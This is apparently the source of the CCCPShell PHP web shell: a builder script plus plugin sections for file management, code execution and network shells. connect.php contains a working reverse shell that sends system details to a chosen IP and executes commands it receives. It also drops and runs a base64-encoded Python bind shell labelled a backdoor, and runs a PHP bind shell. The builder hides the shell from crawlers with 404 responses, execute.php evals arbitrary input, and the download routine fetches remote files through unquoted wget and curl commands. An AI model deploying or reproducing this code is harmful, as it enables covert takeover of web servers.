            if(strpos(strtolower($archive), '.tar.gz')!==false) $target = basename($archive,'.tar.gz');
            else if(strpos(strtolower($archive), '.tgz')!==false) $target = basename($archive,'.tgz');
            else if(strpos(strtolower($archive), '.tar')!==false) $target = basename($archive,'.tar');

            if(!is_dir($target)) mkdir($target);
            $before = count(get_all_files($target));
            $command = ($type == 'untargz' ? 'xzf' : 'xf');
            execute('tar '.$command.' "'.basename($archive).'" -C "'.$target.'"');
            $after = count(get_all_files($target));
            return $before != $after;
        }
    }
    return false;
}
173 |
--------------------------------------------------------------------------------
/builder/builder.php:
--------------------------------------------------------------------------------
1 | {$name}", 'ajaxLoad("me=' . $plugin . '")') . ' | ';
36 |
37 | //plugins
38 | $code = file_get_contents("{$folder}/{$plugin}.php");
39 | if (!empty($sections)) {
40 | $sections .= ' else ';
41 | }
42 |
43 | $sections .= "if (\$p['me'] === '{$plugin}') {
44 | {$code}
45 | }";
46 |
47 | if (file_exists("{$folder}/{$plugin}.js")) {
48 | $js .= file_get_contents("{$folder}/{$plugin}.js");
49 | }
50 |
51 | if (file_exists("{$folder}/{$plugin}.css")) {
52 | $css .= file_get_contents("{$folder}/{$plugin}.css");
53 | }
54 | }
55 |
56 |
57 | // termino de armar
58 | $defAction = "filemanager' . (isset(\$p['dir']) ? '&dir=' . rawurlencode(\$p['dir']) : '') . '";
59 | $menu .= mLink('Logout', 'if (confirm("Are you sure?")) {sessionStorage.clear();hash="";d.getElementsByTagName("html")[0].innerHTML="";}');
60 | $js = 'var config = ' . json_encode($config) . ";\n" . $js;
61 |
62 |
63 | // con esto arreglo el escapado en php y las secciones
64 | $menu = str_replace("'", "\'", $menu);
65 | $js = str_replace("'", "\'", $js);
66 | $sections = str_replace(''dsr', 'slogin'=>'cccpshell', 'sqlclog'=>'conlog'); //Constants names
122 | \$config['sPass'] = '{$config['sPass']}'; // md5(pass)
123 | \$config['rc4drop'] = {$config['rc4drop']}; //drop size
124 |
125 |
126 | // ------ Start CCCPShell
127 | {$php}
128 |
129 | \$sBuff = '';
130 | \$p = getData();
131 |
132 |
133 | # Sections
134 | if (isset(\$p['me'])) {
135 | {$sections}
136 | }
137 |
138 | #Se fini
139 | if (isset(\$_SERVER['HTTP_X_REQUESTED_WITH']) && \$_SERVER['HTTP_X_REQUESTED_WITH'] === 'XMLHttpRequest') {
140 | sAjax(\$sBuff . mHide('etime', substr((microtime(true) - \$loadTime), 0, 4)));
141 | //sAjax(\$sBuff . mHide('etime', substr((microtime(true) - \$loadTime), 0, 4) . ' Mem Peak: ' . sizecount(memory_get_peak_usage(false)) . ' Men: ' . sizecount(memory_get_usage(false))) );
142 | } else {
143 | \$uAgents = array('Google', 'Slurp', 'MSNBot', 'ia_archiver', 'Yandex', 'Rambler', 'Yahoo', 'Zeus', 'bot', 'Wget');
144 | if (empty(\$_SERVER['HTTP_USER_AGENT']) || preg_match('/' . implode('|', \$uAgents) . '/i', \$_SERVER['HTTP_USER_AGENT'])) {
145 | header('HTTP/1.0 404 Not Found');
146 | exit;
147 | }
148 | }
149 | ?>
150 | {$loader}";
151 |
152 |
153 |
154 | //echo $shell;
155 | file_put_contents("{$baseFolder}/CCCP-Shell.php", $shell);
156 | echo 'Generation completed!';
157 |
--------------------------------------------------------------------------------
/builder/includes/jsPacker.php:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xchwarze/CCCPShell/22cda0ce098522c64dc33d5be8f2c2d763d7b645/builder/includes/jsPacker.php
--------------------------------------------------------------------------------
/builder/includes/tools.php:
--------------------------------------------------------------------------------
1 | $t";
6 | }
7 |
/**
 * Write $content to $file and, when ZipArchive is available, also produce
 * "$file.zip" containing it.
 *
 * Review notes:
 *  - The handle from fopen() is never passed to fclose(); the file is added
 *    to the archive while that handle is still open.
 *  - fopen() errors are suppressed with @.
 *
 * @param string $file    Output path.
 * @param string $content Bytes to write.
 * @return bool true when the write (and, if attempted, the zip open) succeeded.
 */
function packer_write_file($file, $content){
    if($fh = @fopen($file, "wb")){
        if(fwrite($fh, $content)!==false){
            // Without the zip extension the plain file is the only output.
            if(!class_exists("ZipArchive")) return true;

            // Replace any archive left from an earlier run.
            if(file_exists($file.".zip")) unlink ($file.".zip");
            $zip = new ZipArchive();
            $filename = "./".$file.".zip";

            if($zip->open($filename, ZipArchive::CREATE)!==TRUE) return false;
            $zip->addFile($file);
            $zip->close();
            return true;
        }
    }
    return false;
}
25 |
/**
 * Escape a string for HTML output, converting both single and double quotes.
 *
 * ENT_QUOTES has the value 3, the same flag value the original spelled as 2 | 1.
 *
 * @param string $str Text to escape.
 * @return string Escaped text.
 */
function packer_html_safe($str){
    $flags = ENT_QUOTES;
    return htmlspecialchars($str, $flags);
}
29 |
/**
 * Send $str as an uncached text/plain response and stop the script.
 *
 * @param string $str Response body.
 */
function packer_output($str){
    $responseHeaders = array(
        "Content-Type: text/plain",
        "Cache-Control: no-cache",
        "Pragma: no-cache",
    );
    foreach ($responseHeaders as $line) {
        header($line);
    }

    echo $str;
    exit();
}
37 |
/**
 * Remove comments and blank lines from PHP source text.
 *
 * Comment tokens are dropped using the tokenizer. The rebuilt text is then
 * passed through two regular expressions: one deletes anything shaped like a
 * block comment (this also matches such text inside string literals), the
 * other collapses runs of blank lines into a single newline.
 *
 * @param string $str PHP source.
 * @return string Source with comments and blank lines removed.
 */
function packer_strips($str){
    // T_DOC_COMMENT / T_ML_COMMENT are only added when this PHP build defines them.
    $skip = array(T_COMMENT);
    foreach (array('T_DOC_COMMENT', 'T_ML_COMMENT') as $constName) {
        if (defined($constName)) {
            $skip[] = constant($constName);
        }
    }

    $kept = array();
    foreach (token_get_all($str) as $tok) {
        if (!is_array($tok)) {
            // Single-character tokens arrive as plain strings.
            $kept[] = $tok;
            continue;
        }
        if (in_array($tok[0], $skip)) {
            continue;
        }
        $kept[] = $tok[1];
    }

    $out = implode('', $kept);
    $out = preg_replace('!/\*.*?\*/!s', '', $out);
    $out = preg_replace('/\n\s*\n/', "\n", $out);

    return $out;
}
64 |
/**
 * Run JavaScript source through the JavaScriptPacker class and return the
 * packed result. The constructor arguments (0, true, false) are passed
 * through unchanged; the class is defined outside this file.
 *
 * @param string $str JavaScript source.
 * @return string Packed JavaScript.
 */
function packer_pack_js($str){
    $jsPacker = new JavaScriptPacker($str, 0, true, false);
    $packed = $jsPacker->pack();
    return $packed;
}
69 |
--------------------------------------------------------------------------------
/builder/sections/connect.php:
--------------------------------------------------------------------------------
1 | The Program is now trying to connect!
';
7 | $sockfd = fsockopen($ip, $port, $errno, $errstr);
8 | if ($errno != 0){
9 | $sBuff .= "$errno: $errstr";
10 | } else if (!$sockfd){
11 | $result = 'Fatal: An unexpected error was occured when trying to connect!
';
12 | } else {
13 | $len = 1500;
14 | fputs($sockfd, execute('uname -a') . "\n");
15 | fputs($sockfd, execute('pwd') . "\n");
16 | fputs($sockfd, execute('id') . "\n\n");
17 | fputs($sockfd, execute('time /t & date /T') . "\n\n");
18 |
19 | while (!feof($sockfd)) {
20 | fputs($sockfd, '(Shell)[$]> ');
21 | fputs($sockfd, "\n" . execute(fgets($sockfd, $len)) . "\n\n");
22 | }
23 | fclose($sockfd);
24 | }
25 | } else if (@(sValid($p['port'])) && (sValid($p['passwd'])) && (sValid($p['mode']))){
26 | $address = '127.0.0.1';
27 | $port = $p['port'];
28 | $pass = $p['passwd'];
29 |
30 | if ($p['mode'] === 'Python'){
31 | $Python_CODE = "IyBTZXJ2ZXIgIA0KIA0KaW1wb3J0IHN5cyAgDQppbXBvcnQgc29ja2V0ICANCmltcG9ydCBvcyAgDQoNCmhvc3QgPSAnJzsgIA0KU0laRSA9IDUxMjsgIA0KDQp0cnkgOiAgDQogICAgIHBvcnQgPSBzeXMuYXJndlsxXTsgIA0KDQpleGNlcHQgOiAgDQogICAgIHBvcnQgPSAzMTMzNzsgIA0KIA0KdHJ5IDogIA0KICAgICBzb2NrZmQgPSBzb2NrZXQuc29ja2V0KHNvY2tldC5BRl9JTkVUICwgc29ja2V0LlNPQ0tfU1RSRUFNKTsgIA0KDQpleGNlcHQgc29ja2V0LmVycm9yICwgZSA6ICANCg0KICAgICBwcmludCAiRXJyb3IgaW4gY3JlYXRpbmcgc29ja2V0IDogIixlIDsgIA0KICAgICBzeXMuZXhpdCgxKTsgICANCg0Kc29ja2ZkLnNldHNvY2tvcHQoc29ja2V0LlNPTF9TT0NLRVQgLCBzb2NrZXQuU09fUkVVU0VBRERSICwgMSk7ICANCg0KdHJ5IDogIA0KICAgICBzb2NrZmQuYmluZCgoaG9zdCxwb3J0KSk7ICANCg0KZXhjZXB0IHNvY2tldC5lcnJvciAsIGUgOiAgICAgICAgDQogICAgIHByaW50ICJFcnJvciBpbiBCaW5kaW5nIDogIixlOyANCiAgICAgc3lzLmV4aXQoMSk7ICANCiANCnByaW50KCJcblxuPT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09Iik7IA0KcHJpbnQoIi0tLS0tLS0tIFNlcnZlciBMaXN0ZW5pbmcgb24gUG9ydCAlZCAtLS0tLS0tLS0tLS0tLSIgJSBwb3J0KTsgIA0KcHJpbnQoIj09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PVxuXG4iKTsgDQogDQp0cnkgOiAgDQogICAgIHdoaWxlIDEgOiAjIGxpc3RlbiBmb3IgY29ubmVjdGlvbnMgIA0KICAgICAgICAgc29ja2ZkLmxpc3RlbigxKTsgIA0KICAgICAgICAgY2xpZW50c29jayAsIGNsaWVudGFkZHIgPSBzb2NrZmQuYWNjZXB0KCk7ICANCiAgICAgICAgIHByaW50KCJcblxuR290IENvbm5lY3Rpb24gZnJvbSAiICsgc3RyKGNsaWVudGFkZHIpKTsgIA0KICAgICAgICAgd2hpbGUgMSA6ICANCiAgICAgICAgICAgICB0cnkgOiAgDQogICAgICAgICAgICAgICAgIGNtZCA9IGNsaWVudHNvY2sucmVjdihTSVpFKTsgIA0KICAgICAgICAgICAgIGV4Y2VwdCA6ICANCiAgICAgICAgICAgICAgICAgYnJlYWs7ICANCiAgICAgICAgICAgICBwaXBlID0gb3MucG9wZW4oY21kKTsgIA0KICAgICAgICAgICAgIHJhd091dHB1dCA9IHBpcGUucmVhZGxpbmVzKCk7ICANCiANCiAgICAgICAgICAgICBwcmludChjbWQpOyAgDQogICAgICAgICAgIA0KICAgICAgICAgICAgIGlmIGNtZCA9PSAnZzJnJzogIyBjbG9zZSB0aGUgY29ubmVjdGlvbiBhbmQgbW92ZSBvbiBmb3Igb3RoZXJzICANCiAgICAgICAgICAgICAgICAgcHJpbnQoIlxuLS0tLS0tLS0tLS1Db25uZWN0aW9uIENsb3NlZC0tLS0tLS0tLS0tLS0tLS0iKTsgIA0KICAgICAgICAgICAgICAgICBjbGllbnRzb2NrLnNodXRkb3duKCk7ICANCiAgICAgICAgICAgICAgICAgYnJlYWs7ICANCiAgICA
gICAgICAgICB0cnkgOiAgDQogICAgICAgICAgICAgICAgIG91dHB1dCA9ICIiOyAgDQogICAgICAgICAgICAgICAgICMgUGFyc2UgdGhlIG91dHB1dCBmcm9tIGxpc3QgdG8gc3RyaW5nICANCiAgICAgICAgICAgICAgICAgZm9yIGRhdGEgaW4gcmF3T3V0cHV0IDogIA0KICAgICAgICAgICAgICAgICAgICAgIG91dHB1dCA9IG91dHB1dCtkYXRhOyAgDQogICAgICAgICAgICAgICAgICAgDQogICAgICAgICAgICAgICAgIGNsaWVudHNvY2suc2VuZCgiQ29tbWFuZCBPdXRwdXQgOi0gXG4iK291dHB1dCsiXHJcbiIpOyAgDQogICAgICAgICAgICAgICANCiAgICAgICAgICAgICBleGNlcHQgc29ja2V0LmVycm9yICwgZSA6ICANCiAgICAgICAgICAgICAgICAgICANCiAgICAgICAgICAgICAgICAgcHJpbnQoIlxuLS0tLS0tLS0tLS1Db25uZWN0aW9uIENsb3NlZC0tLS0tLS0tIik7ICANCiAgICAgICAgICAgICAgICAgY2xpZW50c29jay5jbG9zZSgpOyAgDQogICAgICAgICAgICAgICAgIGJyZWFrOyAgDQpleGNlcHQgIEtleWJvYXJkSW50ZXJydXB0IDogIA0KIA0KDQogICAgIHByaW50KCJcblxuPj4+PiBTZXJ2ZXIgVGVybWluYXRlZCA8PDw8PFxuIik7ICANCiAgICAgcHJpbnQoIj09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09Iik7IA0KICAgICBwcmludCgiXHRUaGFua3MgZm9yIHVzaW5nIEFuaS1zaGVsbCdzIC0tIFNpbXBsZSAtLS0gQ01EIik7ICANCiAgICAgcHJpbnQoIlx0RW1haWwgOiBsaW9uYW5lZXNoQGdtYWlsLmNvbSIpOyAgDQogICAgIHByaW50KCI9PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT0iKTsNCg==";
32 | $bindname = 'bind.py';
33 | $fd = fopen($bindname, 'w');
34 | if ($fd){
35 | fwrite($fd, base64_decode($Python_CODE));
36 | if ($isWIN){
37 | $sBuff .= '[+] OS Detected = Windows';
38 | execute('start bind.py');
39 | $pattern = 'python.exe';
40 | $list = execute('TASKLIST');
41 | } else {
42 | $sBuff .= '[+] OS Detected = Linux';
43 | execute('chmod +x bind.py ; ./bind.py');
44 | $pattern = $bindname;
45 | $list = execute('ps -aux');
46 | }
47 |
48 | if (preg_match("/$pattern/", $list))
49 | $sBuff .= 'Process Found Running! Backdoor Setuped Successfully
';
50 | else
51 | $sBuff .= 'Process Not Found Running! Backdoor Setup FAILED
';
52 |
53 | $sBuff .= "
\nTask List :- \n$list
";
54 | }
55 | }
56 | } else if (@$p['mode'] === 'PHP'){
57 | if (function_exists("socket_create")){
58 | $sockfd = socket_create(AF_INET, SOCK_STREAM, SOL_TCP);// Create a TCP Stream socket
59 | if (socket_bind($sockfd, $address, $port) == false)
60 | $sBuff .= "Cant Bind to the specified port and address!";
61 | socket_listen($sockfd, 17);// Start listening for connections
62 | $client = socket_accept($sockfd);//Accept incoming requests and handle them as child processes
63 | socket_write($client, 'Password: ');
64 | $input = socket_read($client, strlen($pass) + 2); // +2 for \r\n // Read the pass from the client
65 | if (trim($input) == $pass){
66 | socket_write($client, "\n\n");
67 | socket_write($client, ($isWIN) ? execute("date /t & time /t") . "\n" . execute("ver") : execute("date") . "\n" . execute("uname -a"));
68 | socket_write($client, "\n\n");
69 |
70 | while (1){// Print command prompt
71 | $maxCmdLen = 31337;
72 | socket_write($client, '(Shell)[$]> ');
73 | $cmd = socket_read($client, $maxCmdLen);
74 | if ($cmd == false){
75 | $sBuff .= 'The client Closed the conection!';
76 | break;
77 | }
78 | socket_write($client, execute($cmd));
79 | }
80 | } else {
81 | $sBuff .= tText('Wrong Password');
82 | socket_write($client, "Wrong Password!\n\n");
83 | }
84 | socket_shutdown($client, 2);
85 | socket_close($socket);
86 | //socket_close($client);// Close the client (child) socket
87 | //socket_close($sock);// Close the master sockets
88 | } else
89 | $sBuff .= tText('Socket Conections not Allowed/Supported by the server!');
90 | } else {
91 | $sBuff .= '
92 |
93 |
94 |
' . tText('Back Connect') . '
95 |
' . tText('Bind Shell') . '
96 |
97 |
';
111 | }
--------------------------------------------------------------------------------
/builder/sections/execute.php:
--------------------------------------------------------------------------------
1 | ' . tText('Eval/Execute') . '';
7 | $code = @trim($p['c']);
8 | if ($code){
9 | if (isset($p['e'])){
10 | $buf = execute($code, true);
11 | $sBuff .= "
" . tText('Response') . ": ";
12 | if (isset($p['dta']))
13 | $sBuff .= "
";
14 | else
15 | $sBuff .= "
{$buf}
";
16 | } else {
17 | if (!preg_match('#<\?#si', $code))
18 | $code = "";
19 |
20 | //hago esta chapuzada para que no se muestre el resultado arriba
21 | echo tText('Result of the executed code:');
22 | $buf = ob_get_contents();
23 |
24 | if ($buf){
25 | ob_clean();
26 | eval("?" . ">{$code}");
27 | $ret = ob_get_contents();
28 | $ret = convert_cyr_string($ret, 'd', 'w');
29 | ob_clean();
30 | $sBuff .= $buf;
31 |
32 | if (isset($p['dta']))
33 | $sBuff .= '
';
34 | else
35 | $sBuff .= "
{$ret}
";
36 | } else
37 | eval("?" . ">{$code}");
38 | }
39 | }
40 |
41 | $sBuff .= '
';
--------------------------------------------------------------------------------
/builder/sections/filemanager.css:
--------------------------------------------------------------------------------
1 | .asp{background:url("") no-repeat;}
2 | .avi{background:url("") no-repeat;}
3 | .cgi{background:url("") no-repeat;}
4 | .cmd{background:url("") no-repeat;}
5 | .copy{background:url("") no-repeat;}
6 | .cpp{background:url("") no-repeat;}
7 | .del{background:url("") no-repeat;}
8 | .dir{background:url("") no-repeat;}
9 | .doc{background:url("") no-repeat;}
10 | .download{background:url("") no-repeat;}
11 | .edit{background:url("") no-repeat;}
12 | .exe{background:url("") no-repeat;}
13 | .htaccess{background:url("") no-repeat;}
14 | .html{background:url("") no-repeat;}
15 | .info{background:url("") no-repeat;}
16 | .ini{background:url("") no-repeat;}
17 | .jpg{background:url("") no-repeat;}
18 | .js{background:url("") no-repeat;}
19 | .lnk{background:url("") no-repeat;}
20 | .log{background:url("") no-repeat;}
21 | .mp3{background:url("") no-repeat;}
22 | .php{background:url("") no-repeat;}
23 | .pl{background:url("") no-repeat;}
24 | .py{background:url("") no-repeat;}
25 | .rename{background:url("") no-repeat;}
26 | .swf{background:url("") no-repeat;}
27 | .tar{background:url("") no-repeat;}
28 | .txt{background:url("") no-repeat;}
29 | .unk{background:url("") no-repeat;}
30 | .xml{background:url("") no-repeat;}
31 |
--------------------------------------------------------------------------------
/builder/sections/filemanager.php:
--------------------------------------------------------------------------------
1 | $f, 's' => $s);
24 | }
25 |
/**
 * Return the last four octal digits of a path's mode, e.g. "0644".
 *
 * fileperms() errors are suppressed; a failed lookup is converted like any
 * other value.
 *
 * @param string $filepath Path to inspect.
 * @return string Up to four octal digits.
 */
function getChmod($filepath){
    $mode = @fileperms($filepath);
    $octal = base_convert($mode, 10, 8);
    return substr($octal, -4);
}
29 |
/**
 * Render a path's mode as an ls-style string such as "-rw-r--r--".
 *
 * Review notes:
 *  - The directory test (0x4000) comes before the block-device test (0x6000).
 *    Every mode with 0x6000 set also has 0x4000 set, so the 'b' branch cannot
 *    be reached and block devices are reported as 'd'.
 *  - A failed or zero fileperms() result yields a row of question marks.
 *
 * @param string $filepath Path to inspect.
 * @return string Type character followed by nine permission characters.
 */
function getPerms($filepath){
    $mode = @fileperms($filepath);
    if (!$mode) {
        return '???????????';
    }

    if (($mode & 0xC000) === 0xC000) $type = 's'; // Socket
    else if (($mode & 0x4000) === 0x4000) $type = 'd'; // Directory
    else if (($mode & 0xA000) === 0xA000) $type = 'l'; // Symbolic Link
    else if (($mode & 0x8000) === 0x8000) $type = '-'; // Regular
    else if (($mode & 0x6000) === 0x6000) $type = 'b'; // Block special
    else if (($mode & 0x2000) === 0x2000) $type = 'c'; // Character special
    else if (($mode & 0x1000) === 0x1000) $type = 'p';// FIFO pipe
    else $type = 'u'; // Unknown

    // Owner, group and world read/write/execute bits.
    $o['r'] = ($mode & 00400) ? 'r' : '-';
    $o['w'] = ($mode & 00200) ? 'w' : '-';
    $o['e'] = ($mode & 00100) ? 'x' : '-';
    $g['r'] = ($mode & 00040) ? 'r' : '-';
    $g['w'] = ($mode & 00020) ? 'w' : '-';
    $g['e'] = ($mode & 00010) ? 'x' : '-';
    $w['r'] = ($mode & 00004) ? 'r' : '-';
    $w['w'] = ($mode & 00002) ? 'w' : '-';
    $w['e'] = ($mode & 00001) ? 'x' : '-';

    // setuid, setgid and sticky overlay the execute column; uppercase means
    // the underlying execute bit is not set.
    if ($mode & 0x800) $o['e'] = ($o['e']==='x') ? 's' : 'S';
    if ($mode & 0x400) $g['e'] = ($g['e']==='x') ? 's' : 'S';
    if ($mode & 0x200) $w['e'] = ($w['e']==='x') ? 't' : 'T';

    return $type.$o['r'].$o['w'].$o['e'].$g['r'].$g['w'].$g['e'].$w['r'].$w['w'].$w['e'];
}
61 |
/**
 * Return a link showing the owner of a path, with the owner's account record
 * in the link's title attribute.
 *
 * The record comes from posix_getpwuid() and includes the name, passwd field,
 * UID, GID, gecos, home directory and login shell. The values are interpolated
 * into the attribute without escaping. mLink() is defined outside this block.
 *
 * @param string $filepath Path whose owner is looked up.
 * @return string Link markup, or '' when the POSIX functions are unavailable
 *                or the lookup fails.
 */
function getUser($filepath){
    if (function_exists('posix_getpwuid')){
        $array = @posix_getpwuid(@fileowner($filepath));
        if ($array && is_array($array))
            return mLink($array['name'], 'return false;', "title='User: {$array['name']} Passwd: {$array['passwd']} " .
                "UID: {$array['uid']} GID: {$array['gid']} Gecos: {$array['gecos']} Dir: {$array['dir']} " .
                "Shell: {$array['shell']}'", false);
    }
    return '';
}
72 |
/**
 * Return the octal mode and ls-style permission string for a path.
 *
 * $c is set to 'mr' when the path is not readable, 'mw' when it is readable
 * but not writable, and 'mg' otherwise.
 * NOTE(review): $c is not used in the string visible in this listing; any
 * markup that consumed it is not shown here.
 *
 * @param string $t Path to describe.
 * @return string
 */
function vPermsColor($t){
    $c = 'mg';
    if (!is_readable($t))
        $c = 'mr';
    else if (!is_writable($t))
        $c = 'mw';
    return "
" . getChmod($t) . ' ' . getPerms($t) . "";
}
81 |
/**
 * Delete a directory and everything beneath it, without recursion.
 *
 * A single loop tracks the current directory in $path. Files are unlinked as
 * they are read; on meeting a subdirectory the loop descends into it; when a
 * directory is exhausted it is removed and the loop climbs back to the parent
 * by cutting $path at its last DS. The walk ends once the starting directory
 * itself has been removed.
 *
 * Review note: the results of opendir() and unlink() are not checked.
 *
 * @param string $path Directory to remove.
 * @return bool false as soon as an rmdir() fails, true otherwise.
 */
function delTree($path){
    $origipath = $path;
    $h = opendir($path);
    while (true){
        $item = readdir($h);
        if ($item === '.' or $item === '..')
            continue;

        // readdir() returned false: this directory has no more entries.
        if (gettype($item) === 'boolean'){
            closedir($h);
            if (!@rmdir($path))
                return false;

            if ($path == $origipath)
                break;

            // Climb to the parent and re-read it from the start.
            $path = substr($path, 0, strrpos($path, DS));
            $h = opendir($path);
        } else if (is_dir($path . DS . $item)){
            // Descend into the subdirectory.
            closedir($h);
            $path = $path . DS . $item;
            $h = opendir($path);
        } else
            unlink($path . DS . $item);
    }
    return true;
}
109 |
/**
 * Copy a file, or a directory with all of its contents, to $dest.
 *
 * Review notes:
 *  - Child paths are built as $path . $file and $dest . $file with no
 *    separator, so both arguments are expected to end with one. The recursive
 *    call passes $dest . DS . $file . DS, which adds a separator of its own.
 *  - mkdir() errors are suppressed and the results of the inner copy() calls
 *    are ignored; the directory branch always returns true.
 *
 * @param string $path Source file or directory.
 * @param string $dest Destination path.
 * @return bool
 */
function recursiveCopy($path, $dest){
    if (is_dir($path)){
        @mkdir($dest);
        $objects = scandir($path);
        if (sizeof($objects) > 0){
            foreach($objects as $file){
                if ($file !== '.' && $file !== '..'){
                    if (is_dir($path.$file))
                        recursiveCopy($path . $file . DS, $dest . DS . $file . DS);
                    else
                        copy($path . $file, $dest . $file);
                }
            }
        }
        return true;
    } else if(is_file($path)){
        return copy($path, $dest);
    } else {
        return false;
    }
}
131 |
/**
 * Return the extension of a file name, without the dot.
 *
 * @param string $file File name or path.
 * @return string Extension, or '' when the name has none.
 */
function getext($file){
    $parts = pathinfo($file);
    if (isset($parts['extension'])) {
        return $parts['extension'];
    }

    return '';
}
136 |
/**
 * Decide whether a path passes the listing filters.
 *
 * Only the writability filter is active: when $w is truthy the path must be
 * writable. $f is accepted but not used; the content and extension filters
 * that would have used it exist only as disabled code in the original.
 *
 * @param string $t Path to test.
 * @param mixed  $w Truthy to require that $t is writable.
 * @param mixed  $f Unused.
 * @return bool
 */
function checkFile($t, $w, $f){
    if (!$w) {
        return true;
    }

    return is_writable($t);
}
155 |
/**
 * Fetch a URL and store the response at $save.
 *
 * file_get_contents() is tried first. On non-Windows hosts the function then
 * falls back, in order, to wget, curl, lwp-download and lynx, each run through
 * execute() (defined outside this block), and treats the existence of $save
 * as success.
 *
 * Review notes:
 *  - The URL check is unanchored and only requires "<lowercase letters>://"
 *    followed by at least one character somewhere in the string.
 *  - $url and $save are concatenated into the command lines without quoting
 *    or escaping.
 *  - Any existing file at $save is deleted before the first attempt.
 *  - Analyst note: the fallbacks start wget, curl, lwp-download or lynx from
 *    the PHP process, so outbound-fetch utilities appearing as children of
 *    the web server are the observable trace of this function.
 *
 * @param string $url  Source URL.
 * @param string $save Destination path.
 * @return bool
 */
function download($url, $save){
    global $isWIN;

    if(!preg_match("/[a-z]+:\/\/.+/",$url)) return false;
    if(is_file($save)) unlink($save);
    if($sBuff = file_get_contents($url)){
        if(file_put_contents($save, $sBuff))
            return true;
    }

    if (!$isWIN){
        $buff = execute('wget '.$url.' -O '.$save);
        if(is_file($save)) return true;
        $buff = execute('curl '.$url.' -o '.$save);
        if(is_file($save)) return true;
        $buff = execute('lwp-download '.$url.' '.$save);
        if(is_file($save)) return true;
        $buff = execute('lynx -source '.$url.' > '.$save);
        if(is_file($save)) return true;
    }

    return false;
}
179 |
/**
 * Collect directory and file names from $dir into the globals $fDataD and
 * $fDataF, with optional paging.
 *
 * With a non-zero $limit, entries are counted and only those between
 * $limit * ($page - 1) and $limit * $page are recorded. Nothing is returned.
 *
 * Review notes:
 *  - The recursive call passes ($find, $rec, $count) where the signature
 *    expects ($onlyW, $find, $rec, $count), so each value lands one parameter
 *    early and $count is left at its default.
 *  - Entry paths are built as $dir . $file with no separator, including the
 *    path handed to the recursive call.
 *  - while ($file = readdir($res)) also stops on an entry whose name is
 *    falsy, such as "0".
 *
 * @param string   $typ   'dir' to list only directories, 'file' for only files.
 * @param string   $dir   Directory to read; expected to end with a separator.
 * @param int      $limit Page size; falsy disables paging.
 * @param int|null $page  1-based page number; defaults to 1 when paging.
 * @param mixed    $onlyW Truthy to keep only writable entries (see checkFile()).
 * @param mixed    $find  Passed to checkFile().
 * @param mixed    $rec   Truthy to descend into subdirectories.
 * @param int      $count Running entry counter.
 */
function fileList($typ, $dir, $limit, $page, $onlyW = false, $find = false, $rec = false, $count = 0){
    global $fDataD, $fDataF;
    $sFolder = $sFile = $show = true;
    if ($limit){
        $show = false;
        if (!isset($page))
            $page = 1;

        // Turn the page size into an absolute [start, limit) window.
        $start = $limit * ($page - 1);
        $limit = $limit * $page;
    }

    if ($typ === 'dir')
        $sFile = false;
    else if ($typ === 'file')
        $sFolder = false;

    if ($res = opendir($dir)){
        while ($file = readdir($res)){
            if ($limit) {
                if ($count == $start)
                    $show = true;

                if ($count == $limit)
                    break;
            }

            if ($file !== '.' && $file !== '..' && is_dir($dir . $file)){
                if ($rec)
                    //yield fileList($typ, $dir . $file, $limit, $page, $find, $rec, $count);
                    fileList($typ, $dir . $file, $limit, $page, $find, $rec, $count);
                else if ($show && $sFolder && checkFile($dir . $file, $onlyW, $find))
                    //yield array('t'=>'d', 'n'=>$file);
                    $fDataD[] = $file;

                $count++;
            } else if (is_file($dir . $file) && $sFile){
                if ($show && checkFile($dir . $file, $onlyW, $find))
                    //yield array('t'=>'f', 'n'=>$file);
                    $fDataF[] = $file;

                $count++;
            } //TODO syslinks
        }

        closedir($res);
        @clearstatcache();
    }
}
229 |
230 |
231 | // start of request handling
232 | if (@$p['md'] === 'vs'){
233 | $s = dirsize($p['f']);
234 | sAjax(is_numeric($s['s']) ? sizecount($s['s']) . ' (' . $s['f'] . ')' : 'Error?');
235 | } else if (@$p['md'] === 'tools'){
236 | switch ($p['ac']){
237 | case 'cdir':
238 | if (file_exists($p['a'] . $p['b']))
239 | sAjax(tText('alredyexists', 'object alredy exists'));
240 |
241 | @mkdir($p['a'] . $p['b'], 0777);
242 | @chmod($p['a'] . $p['b'], 0777);
243 | if (file_exists($p['a'] . $p['b']))
244 | sAjax('OK');
245 |
246 | sAjax(tText('fail', 'Fail!'));
247 | break;
248 | case 'cfile':
249 | if (file_exists($p['a'] . $p['b']))
250 | sAjax(tText('alredyexists', 'object alredy exists'));
251 |
252 | if (false !== file_put_contents($p['a'] . $p['b'], ''))
253 | sAjax('OK');
254 |
255 | sAjax(tText('accessdenied', 'Access denied'));
256 | break;
257 | case 'comp':
258 | if ($p['dl']){
259 | $zip = new PHPZip();
260 | $zip->Zipper($p['fl'], $p['dl']);
261 | header('Content-Type: application/octet-stream');
262 | header('Accept-Ranges: bytes');
263 | header('Accept-Length: ' . strlen($compress));
264 | header('Content-Disposition: attachment;filename=' . $_SERVER['HTTP_HOST'] . '_' . date('Ymd-His') . '.zip');
265 | echo $zip->file();
266 | exit;
267 | }
268 | break;
269 | case 'uncomp':
270 | if ($p['dl']){
271 | $types['zip'] = 'zip';
272 | $types['tar'] = 'tar';
273 | $types['tar.gz'] = 'targz';
274 | $types['tgz'] = 'targz';
275 |
276 | $fNames = array();
277 | foreach($p['dl'] as $value){
278 | $ext = pathinfo($value);
279 | if (isset($types[ $ext['extension'] ]))
280 | if (decompress($types[ $ext['extension'] ], $p['fl'] . $value, $p['fl']))
281 | $fNames[] = $value;
282 | }
283 |
284 | sAjax(tText('pfm', 'Process files:') . implode(', ', $fNames) . ' (' . count($fNames) . ')');
285 | }
286 | break;
287 | case 'reup':
288 | if (download($p['b'], $p['a'] . basename($p['b'])))
289 | sAjax('OK');
290 |
291 | sAjax(tText('fail', 'Fail'));
292 | break;
293 | case 'copy':
294 | if ($p['dl']){
295 | $fNames = Array();
296 | $total = count($p['dl']);
297 | if ($p['b'][(strlen($p['b']) - 1)] !== DS) $p['b'] .= DS;
298 | for ($z = 0; $total > $z; $z++){
299 | $fileinfo = pathinfo($p['fl'] . $p['dl'][$z]);
300 | if (!file_exists($p['fl'] . $p['dl'][$z]))
